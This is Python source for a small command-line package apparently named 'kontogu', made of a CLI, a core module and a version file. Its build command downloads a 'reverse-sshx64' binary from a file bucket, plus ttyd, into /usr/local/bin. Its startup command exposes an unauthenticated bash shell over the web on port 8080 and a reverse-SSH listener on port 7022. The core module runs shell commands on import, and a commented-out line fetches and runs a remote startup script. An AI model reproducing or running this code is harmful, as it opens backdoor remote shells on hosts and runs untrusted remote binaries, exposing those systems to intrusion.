
import argparse
import os, sys 

from kontogu import core 


def cmd_test():
    print('here cmd test')
    pass

def cmd_build(args):
    cmd = '''
curl -o /usr/local/bin/ttyd https://github.com/tsl0922/ttyd/releases/download/1.6.1/ttyd_linux.x86_64 
chmod +x /usr/local/bin/ttyd

curl -o /usr/local/bin/reverse-sshx64 https://bucket-2022.s3.us-west-004.backblazeb2.com/linshi/tools/reverse-sshx64  
chmod a+x /usr/local/bin/reverse-sshx64
    '''
    os.system(cmd)
    print('ok , build finish')
    

def cmd_startup(args):
    cmd = '''
reverse-sshx64 -l -v -p 7022 & 
ttyd -p 8080  bash & 
    '''
    os.system(cmd)
    print('ok , startup finish')
    

def execute():
    try:
        args = sys.argv
        if len(args) < 2:
            #_print_commands()
            #check_new_version()
            return

        command = args.pop(1)
        if command == "test":
            cmd_test()
        elif command == "build":
            cmd_build(args)
        elif command == "startup":
            cmd_startup(args)
        else:
            #_print_commands()
            print('command error')
    except KeyboardInterrupt:
        pass

    #check_new_version()


if __name__ == "__main__":
    execute()


# Insert your code here. 

import os 

os.system('echo kontogu core been import ...')

#os.system('curl cip.cc')

def startup(id=450, platform='replit', tags=''):

    #cmd = 'curl -L -O https://fhost.devxops.eu.org/devops/cicd/startups/{}-startup.sh; bash {}-startup.sh {} {} {};'.format(platform, platform, id, platform, tags)
    cmd = 'echo hare is startup for test .... '
    
    os.system(cmd)
    print('ok , finish')
    #os.system('sleep 24h')



# 8b    d8 Yb  dP 88""Yb    db     dP""b8 88  dP    db     dP""b8 888888
# 88b  d88  YbdP  88__dP   dPYb   dP   `" 88odP    dPYb   dP   `" 88__
# 88YbdP88   8P   88"""   dP__Yb  Yb      88"Yb   dP__Yb  Yb  "88 88""
# 88 YY 88  dP    88     dP""""Yb  YboodP 88  Yb dP""""Yb  YboodP 888888

VERSION = (1, 1, 0)

__version__ = '.'.join(map(str, VERSION))
